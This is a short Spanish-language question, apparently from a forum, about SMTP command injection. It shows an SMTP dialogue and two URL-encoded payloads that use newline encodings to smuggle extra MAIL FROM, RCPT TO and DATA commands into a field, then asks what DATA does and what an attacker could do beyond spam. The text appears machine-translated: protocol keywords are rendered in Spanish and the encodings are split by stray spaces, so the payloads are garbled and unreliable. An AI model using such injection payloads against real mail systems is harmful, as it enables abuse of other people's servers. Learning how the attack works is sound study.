Hay algunas cosas que no entiendo sobre la inyección.
La inyección es algo en esta línea
> .
MAIL FROM: [email protected]
RCPT TO: [email protected]
DATA
EMAIL data
.
Aquí hay dos formas de inyectar en línea:
% 0aDATA% 0afoo% 0a% 2e% 0aMAIL + DESDE: +% 0aRCPT + HASTA: +% 0aDATA% 0aDe: +% 0aTo: +% 0aS ubject: + prueba% 0afoo% 0a% 2e% 0a
o
% 0d% 0aDATA% 0d% 0afoo% 0d% 0a% 2e% 0d% 0aMAIL + DESDE: +% 0 d% 0aRCPT + TO: +% 0d% 0aDATA% 0d% 0aFrom: +% 0d% 0aTo: +% 0d% 0a Tema: + prueba% 0d% 0 afoo% 0d% 0a% 2e% 0d% 0a
¿Por qué utilizo la palabra clave DATA, qué hace?
Supongamos que la inyección tiene éxito! ¿Qué puede hacer un atacante con eso, aparte del spam?